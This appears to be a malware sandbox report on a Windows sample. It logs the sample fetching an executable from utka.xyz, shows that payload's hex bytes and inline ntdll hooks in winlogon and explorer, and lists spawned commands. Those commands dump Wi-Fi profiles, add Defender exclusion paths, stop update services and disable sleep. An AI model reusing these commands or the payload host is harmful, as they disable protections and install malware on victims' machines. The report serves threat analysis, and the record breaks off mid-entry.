Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	49777	104.16.184.241	80	4540	C:\Users\user\Desktop\zufmUwylvo.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:30:05.969144106 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Oct 9, 2024 16:30:06.123402119 CEST	537	IN	HTTP/1.1 200 OK Date: Wed, 09 Oct 2024 14:30:06 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=eeCrMF9_CtMofE414kyqrc8zQ_gToRIJE.yUBe29nv8-1728484206-1.0.1.1-O9BIIBaw5a5gyNFuJw8HAZ0aE5ppC_2U9m8zryStPUIxCMQwpU8dJome2GKEDjFMhqo.6yNcf5n.6gYRQvLpuQ; path=/; expires=Wed, 09-Oct-24 15:00:06 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8cff110f9c470f65-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 0a Data Ascii: 191.96.150.187

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	49775	84.32.84.151	443	4540	C:\Users\user\Desktop\zufmUwylvo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-09 14:29:48 UTC	66	OUT	GET /1234.exe HTTP/1.1 Host: utka.xyz Connection: Keep-Alive
2024-10-09 14:29:49 UTC	535	IN	HTTP/1.1 200 OK Server: hcdn Date: Wed, 09 Oct 2024 14:29:49 GMT Content-Type: application/x-executable Content-Length: 20970496 Connection: close last-modified: Mon, 30 Sep 2024 19:13:56 GMT etag: "13ffc00-66faf874-6cb4d912d515bc0b;;;" platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests x-turbo-charged-by: LiteSpeed alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 41b50fc6795a9c3f59bbbb1239c4ffff-bos-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.010 Accept-Ranges: bytes
2024-10-09 14:29:49 UTC	834	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0e 00 99 f4 fa 66 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 02 26 00 ae 01 00 00 5c 5b 00 00 26 00 00 52 0a 5d 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 40 02 00 04 00 00 52 85 40 01 02 00 20 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdf/&\[&R]@@R@
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 4b 69 00 00 00 00 58 00 00 00 00 e0 00 01 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 2e 3e 66 00 00 00 00 a8 ed 3f 01 00 f0 00 01 00 ee 3f 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 c0 06 00 00 00 e0 40 02 00 08 00 00 00 f4 3f 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 b7 27 01 00 00 00 00 00 00 00 00 00 00 00 00 dc 43 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: KiX@..>f??`h.rsrc@?@@'C
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 5a 71 33 2f ed fe 1a 19 33 2f ed 0e ba c1 33 2f ed ee cb e9 33 2f ed 6e 3a d1 33 2f ed 8e 8a aa 4e 8f ea be d6 2f 37 58 c7 d0 58 d2 2b a3 1f 17 11 10 d2 2b a3 1f cf 59 98 d2 2b a3 67 cf 59 30 d2 2b a3 af 77 a1 d7 ba 27 43 6f cf e9 c3 c4 7c 1b b2 6f 3d a7 88 12 c9 fa e9 3d 10 38 3f d6 16 b8 36 af a9 62 3b 86 1d 24 08 e2 ff 7b c4 c1 2e 78 1b 51 b6 14 fe 2c 30 fc e9 ca 50 d5 35 6e ed 18 2d e7 66 75 67 b8 c6 1e 20 bf d2 41 79 41 00 11 b9 28 d5 6b f2 36 de 2d f8 19 8f 40 73 48 14 a4 0b 20 2a 37 1e 38 a0 72 16 be f4 ca 33 e9 32 e2 1d c0 a8 c5 2d b7 eb db f5 fa c9 61 16 cf f6 29 eb f0 dc 1a f0 cf a7 e3 74 8d b7 eb 5b 66 43 75 35 96 d3 e1 cc 5d 62 2d 8e 44 d5 05 37 94 35 64 87 22 73 48 14 24 07 2e a4 2b 66 13 1f 7b 8d d2 68 51 8d b7 eb 5b 8a 2a f8 90 47 39 94 2e Data Ascii: Zq3/3/3/3/n:3/N/7XX++Y+gY0+w'Co\|o==8?6b;${.xQ,0P5n-fug AyA(k6-@sH 78r32-a)t[fCu5]b-D75d"sH$.+f{hQ[G9.
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: dd 4d c3 ba 6b 5f 38 e8 3c 11 2a 00 97 00 7b 96 03 1b 81 b4 b0 2a c2 57 23 81 b4 b0 aa 66 83 bb 03 dc 8e 86 66 48 2f fb 6e 4f 6d fb b8 87 64 b7 ac 59 7f c7 53 fe 70 47 88 bc 24 83 82 68 c6 4d 21 e6 6a 7b 52 23 4a 5e da 2e ae 1a 87 11 d9 b5 3c 89 d6 4d a9 34 53 27 e7 44 f9 ed a4 1f 69 19 29 78 f2 e8 a7 64 15 04 00 d0 aa 58 da d1 77 78 9d 2d fd 32 be 71 e5 87 11 d9 d6 d8 0f 61 a4 ee a7 77 43 c3 48 7a 3e 17 c0 d1 bb e5 87 11 bf 38 dd a2 51 4b 4b 6c c1 ac a7 8b 20 10 e5 87 11 d9 58 e7 50 ef 50 da 63 fe 0b 27 46 ee 18 78 ee 2e 2e 43 da 8b 10 ab 51 11 60 1c 96 5a 80 9f a3 f0 f9 dd 28 ce 23 b2 99 36 b4 58 cb 27 1a 89 04 ec 27 4f e3 58 5a 74 d5 ce c0 01 e7 00 91 f1 82 d5 30 3d f8 43 0f 3b ce 44 54 f3 20 a4 97 e3 44 a0 35 23 c7 57 ff ad 16 de 0d 88 05 57 50 af 14 Data Ascii: Mk_8<{W#ffH/nOmdYSpG$hM!j{R#J^.<M4S'Di)xdXwx-2qawCHz>8QKKl XPPc'Fx..CQ`Z(#6X''OXZt0=C;DT D5#WWP
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 92 62 7c c3 95 6c 9f d1 c5 1c 38 28 dc ad e0 76 7d 1d 92 69 dd d0 c5 1c 38 f7 14 c3 a2 58 d6 87 3c 2a 4f 6b fd ab c3 ed 78 20 c8 16 cc 93 cf 2f 1c 47 d5 3e 6b 7b e0 d3 5f 40 23 99 9d 91 03 0c 95 d4 a9 07 15 1d 3a e6 3f ab cb 44 13 3e 19 05 0b a8 4b 16 08 61 b2 b4 0d 9f b9 be 17 aa 09 d3 ee 7b ac 88 ca 17 cc d1 c5 1c 38 47 f4 5b 76 fb 41 0e 6f 24 f8 ff 3b f7 ca be 23 2a 1a 9d c3 80 8f 77 15 d0 c5 1c d4 e5 63 be 17 41 84 5a 34 aa c3 ed 78 5f 73 27 05 4b c3 1e 05 db 20 65 a5 69 89 02 f4 96 d0 c4 df 0b 2f 3a e3 e7 dd 8f 54 40 6c e3 0b 45 e4 c4 5e 34 46 27 d3 c5 1c 38 16 f8 97 cc 15 da 35 ce 70 ab c8 d8 7a 07 2f ea 0c bf e9 84 6e ad 7a d1 93 66 d6 48 8f 38 4d 04 85 ba a4 b7 5b 9b 2f d1 d4 8a c2 b6 87 69 41 27 15 f3 27 3a e3 c7 d1 56 70 c5 cc 12 eb 49 72 1c 87 Data Ascii: b\|l8(v}i8X<Okx /G>k{_@#:?D>Ka{8G[vAo$;#wcAZ4x_s'K ei/:T@lE^4F'85pz/nzfH8M[/iA'':VpIr
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 23 85 34 bb a2 6f 81 cf 15 34 8b 30 c9 cf 15 34 92 6e 49 cf 15 34 83 19 51 3e 18 a6 66 a9 1e 57 82 b6 f8 42 91 f0 19 71 db 4f cb 04 3c 71 da 42 00 2f 62 57 53 e1 79 07 23 78 ab b0 1a ea 4f 8b 78 ab b0 46 aa 53 33 f8 90 b8 0c 18 44 7e 2e ed 39 58 de 1e 7b 4e 2b 93 4f 7f 22 c2 e9 c9 37 f0 c6 79 23 22 9b d6 dc 73 c2 c3 69 49 2a d3 c2 c3 69 08 ba 13 c2 c3 69 28 e4 bb c2 c3 69 a0 1d 53 b9 28 fd 8e 8a 4c f6 6f 60 c1 a5 4d 50 d4 42 d0 d6 10 44 cc d7 29 90 3b a9 fb 7a 96 09 0d 7a b5 b0 18 58 e5 6d f8 dd 8e 6c 14 66 49 9e b6 ac a7 85 01 75 84 4a 4f b0 d8 6d d5 05 0d 96 7c 40 c1 ad e6 6b a0 9e 49 6b 4f 83 47 c1 47 a7 c2 48 bb a8 46 92 0e 7d 13 56 fe 28 80 f1 2c a1 d8 1d 46 5b ef f9 25 f2 25 2e 77 f0 0e ca 95 2e 77 f0 9f a4 fd 2e 77 f0 16 1c 15 a6 e2 b7 ae a6 26 d4 Data Ascii: #4o404nI4Q>fWBqO<qB/bWSy#xOxFS3D~.9X{N+O"7y#"siI*ii(iS(Lo`MPBD);zzXmlfIuJOm\|@kIkOGGHF}V(,F[%%.w.w.w&
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: ac 1e 0c 16 e5 64 cf 45 93 05 2c 01 86 61 a8 4b 2c e4 18 73 5a 73 3e f1 77 b4 11 35 b2 ee f4 0f 52 60 d1 0a 52 ef 37 74 ba ad f4 01 ec 75 7d ef 63 3b 09 52 0a fa 03 31 e0 1a 00 02 5a 98 f8 1a 00 02 f3 49 10 1a 00 02 da c0 28 1a 00 02 83 47 48 1a 00 02 03 f6 38 01 91 46 f5 3b a8 45 12 88 a2 d8 1a 7f e0 32 83 a1 ab 19 76 80 1d 26 3d 5c 94 4d 58 bd 76 e4 62 3d 2e 25 1e 67 9e 8f fc c2 be f3 3f 0a e9 7a b2 2e 07 64 9e 8f 74 d0 99 28 4d b4 3b 01 d7 bf 61 70 0b 53 4c 09 91 8a 43 c6 d1 8e dd 9e e1 96 ee b9 91 62 8d 38 59 9c 51 94 a5 63 64 aa 6c 6a 14 66 29 ec 5f 22 e6 e0 c3 e0 22 1f bb a1 44 c5 a1 f7 d2 5e b7 9a 61 70 bb f1 13 25 ee 30 ad d1 2f 60 39 64 9e 8f 20 50 14 51 74 d0 a2 4e 46 6c 8f 79 85 ae 10 1b 70 fc 52 d8 65 f9 29 b9 ac c9 47 9a 18 66 9c 02 cf fd 19 Data Ascii: dE,aK,sZs>w5R`R7tu}c;R1ZI(GH8F;E2v&=\MXvb=.%g?z.dt(M;apSLCb8YQcdljf)_""D^ap%0/`9d PQtNFlypRe)Gf
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: f6 8e ff 32 72 2a 8a 93 77 c6 8d 11 b8 c8 4a b9 9d 20 72 bc 20 2c e6 45 eb 73 24 48 eb 66 50 f3 4e 97 20 1f b8 0e d6 36 7e 0f 78 5e d5 3e eb 2b 7e c3 75 f8 5b b0 68 df 37 58 fb b0 68 df e7 68 3b b0 68 df 07 38 ad cc 98 46 2e 0b 24 49 0d 27 07 fc c4 68 83 3f 72 66 cb 27 f5 7d 9c 02 2e 64 71 8a 31 b1 49 bf 3c 96 1e 32 03 5a ac ac 26 6e 32 03 5a 24 cc 9e b6 8f 58 5a 9a 8a 93 07 ac a5 11 c8 28 0a 92 cc fc a5 c0 68 8a 52 66 e8 a5 a0 9c 48 81 44 24 08 9c a7 d4 be 48 c7 44 24 10 27 cd 36 55 ff 74 24 00 9d 48 8d 64 24 10 e8 1d 83 28 01 d0 5b 82 b6 36 4e 5f fc 19 71 f5 49 b5 8a 54 4f 78 58 d1 dd 8a 54 4f 50 58 bd 8d 8a 54 4f 48 58 f9 c5 8a 54 4f f0 14 85 2d 0d bc 68 03 a3 ff a1 a8 b1 a2 81 6a 01 0b e0 6d d0 2c a5 e5 05 62 f6 e8 7b a8 d6 19 ad c7 88 b3 23 ad a8 2a Data Ascii: 2rwJ r ,Es$HfPN 6~x^>+~u[h7Xhh;h8F.$I'h?rf'}.dq1I<2Z&n2Z$XZ(hRfHD$HD$'6Ut$Hd$([6N_qITOxXTOPXTOHXTO-hjm,b{#
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 0b c6 f6 37 a7 ab 08 86 5c b5 e8 f6 ee ce 60 1d 50 09 b4 5c 27 00 c8 4f 60 fc d5 12 39 b3 22 f7 bd f6 d7 64 69 d6 ce 50 78 29 b4 31 c7 99 60 94 7f 77 79 fe 37 a6 94 b6 33 e2 28 58 cf 0c 24 3c 9b ca cb 67 98 16 4f 33 95 64 76 3c c2 37 36 d9 9d 3e 7d 52 f5 4a 61 49 eb 71 af 5e ad 44 9b 68 13 00 99 07 40 a8 f2 61 2e 5f ad 9d fc 7c de 46 d3 f8 42 ce 38 66 db 7f dd 43 c9 92 0e 3a ea b4 2d 84 30 8c 18 53 b4 31 c7 f9 7a c7 c2 ab e3 5b 86 43 0a e9 23 90 8d 13 34 66 38 4e bd f5 16 6c 9b f1 99 bf fc f7 5f 52 10 8f 0d fd 3a 90 91 26 46 bc 1f 66 02 d1 8d 3c 3a 66 5e 33 bb af 06 79 0f e3 4a ce 38 66 58 4b 2d 3f 34 b8 ac f5 42 a0 58 d3 17 38 6e 5c dc 0c d5 35 4d d8 50 08 6a 5c c2 37 36 d9 d2 1c 67 32 c6 ac 5e 32 d1 12 37 92 87 f2 76 a8 34 1b df 7d 7c 14 88 e9 e1 f4 26 Data Ascii: 7\`P\'O`9"diPx)1`wy73(X$<gO3dv<76>}RJaIq^Dh@a._\|FB8fC:-0S1z[C#4f8Nl_R:&Ff<:f^3yJ8fXK-?4BX8n\5MPj\76g2^27v4}\|&
2024-10-09 14:29:49 UTC	1369	IN	Data Raw: 1e 6d dd 0e 4f 8c 5e 78 10 61 5d ce 95 cf cb 2a 70 84 99 2a aa 48 9a 9e 9e f9 b7 05 eb f9 78 e8 88 15 1d b8 db 5b fc 85 ab 10 4a 8f 4b ce c7 32 c7 91 2b 17 a2 f7 0d d2 dc cd 89 31 91 cc b4 31 f6 87 39 5d 67 cd 2f c4 77 58 df 6d 3e 41 2f c7 bb 68 90 3b 30 24 95 ff 7f 4d 7e a5 be c4 5b 26 43 f9 6b 98 c5 90 78 12 52 7e 9f e2 ad 3c 95 58 8a bb b8 21 98 7b 72 56 e7 e3 c6 68 b7 1c fb db 9b b8 d1 dd 6c a7 9f f7 d9 38 ba b8 21 98 d4 20 d7 55 c0 90 ee 55 d7 2e 87 f5 80 e2 7d 0c d9 4c 01 8b 40 60 c4 ed e4 16 3f a5 64 72 d9 b5 6e 58 6a 22 3d a2 51 d4 e6 c0 be d0 d8 f0 0e 02 0f 3a 82 6e 75 db 10 40 5a 46 0d d1 ca 88 e8 ba 3f 41 2f bc 3e 7f 45 f4 7f c4 2e 4e 11 88 b6 25 3f 78 00 3c b2 10 ff 51 72 c2 fd 84 22 7a b9 3d 9a 22 c3 e1 db 55 ec 52 4b ec 9b 28 5d 4f 06 47 09 Data Ascii: mO^xa]pHx[JK2+119]g/wXm>A/h;0$M~[&CkxR~<X!{rVhl8! UU.}L@`?drnXj"=Q:nu@ZF?A/>E.N%?x<Qr"z="URK(]OG

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9A 0xA3 0x32 0x2E 0xEF
NtQuerySystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
ZwResumeThread	INLINE	0xE9 0x98 0x83 0x32 0x29 0x9F
NtDeviceIoControlFile	INLINE	0xE9 0x9E 0xE3 0x33 0x35 0x5F
ZwDeviceIoControlFile	INLINE	0xE9 0x9E 0xE3 0x33 0x35 0x5F
NtEnumerateKey	INLINE	0xE9 0x9A 0xA3 0x32 0x2E 0xEF
NtQueryDirectoryFile	INLINE	0xE9 0x98 0x83 0x32 0x2D 0xDF
ZwEnumerateValueKey	INLINE	0xE9 0x9E 0xE3 0x33 0x32 0x2F
ZwQuerySystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
NtResumeThread	INLINE	0xE9 0x98 0x83 0x32 0x29 0x9F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
NtQueryDirectoryFileEx	INLINE	0xE9 0x95 0x53 0x30 0x0C 0xCF
NtEnumerateValueKey	INLINE	0xE9 0x9E 0xE3 0x33 0x32 0x2F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x95 0x53 0x30 0x0C 0xCF
ZwQueryDirectoryFile	INLINE	0xE9 0x98 0x83 0x32 0x2D 0xDF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9A 0xA3 0x32 0x2E 0xEF
NtQuerySystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
ZwResumeThread	INLINE	0xE9 0x98 0x83 0x32 0x29 0x9F
NtDeviceIoControlFile	INLINE	0xE9 0x9E 0xE3 0x33 0x35 0x5F
ZwDeviceIoControlFile	INLINE	0xE9 0x9E 0xE3 0x33 0x35 0x5F
NtEnumerateKey	INLINE	0xE9 0x9A 0xA3 0x32 0x2E 0xEF
NtQueryDirectoryFile	INLINE	0xE9 0x98 0x83 0x32 0x2D 0xDF
ZwEnumerateValueKey	INLINE	0xE9 0x9E 0xE3 0x33 0x32 0x2F
ZwQuerySystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
NtResumeThread	INLINE	0xE9 0x98 0x83 0x32 0x29 0x9F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9A 0xA3 0x32 0x2C 0xCF
NtQueryDirectoryFileEx	INLINE	0xE9 0x95 0x53 0x30 0x0C 0xCF
NtEnumerateValueKey	INLINE	0xE9 0x9E 0xE3 0x33 0x32 0x2F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x95 0x53 0x30 0x0C 0xCF
ZwQueryDirectoryFile	INLINE	0xE9 0x98 0x83 0x32 0x2D 0xDF

Target ID:	0
Start time:	10:29:47
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\zufmUwylvo.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\zufmUwylvo.exe"
Imagebase:	0x125b8dc0000
File size:	266'752 bytes
MD5 hash:	C526CB2C72A976831C06FC09991E20D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:29:51
Start date:	09/10/2024
Path:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Imagebase:	0x140000000
File size:	20'970'496 bytes
MD5 hash:	413E4E7BC129E8165D1FFD2B1AE5DB04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:29:52
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Imagebase:	0x7ff7e5d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:29:52
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:29:52
Start date:	09/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff666670000
File size:	14'848 bytes
MD5 hash:	CA9A549C17932F9CAA154B5528EBD8D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:29:52
Start date:	09/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff69bb50000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:29:52
Start date:	09/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr All
Imagebase:	0x7ff75ad70000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:29:55
Start date:	09/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff695fe0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:29:55
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:29:56
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7e5d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:29:56
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:29:56
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:29:56
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff7fa3b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7e5d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a42c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff76f9c0000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6f0da0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:29:57
Start date:	09/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
